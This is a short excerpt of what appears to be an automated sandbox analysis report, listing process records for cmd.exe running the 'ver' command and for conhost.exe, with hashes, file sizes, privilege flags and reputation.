Commandline:	C:\Windows\system32\cmd.exe /c "ver"
Imagebase:	0x7ff6f8440000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	07:31:22
Start date:	08/09/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff751820000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true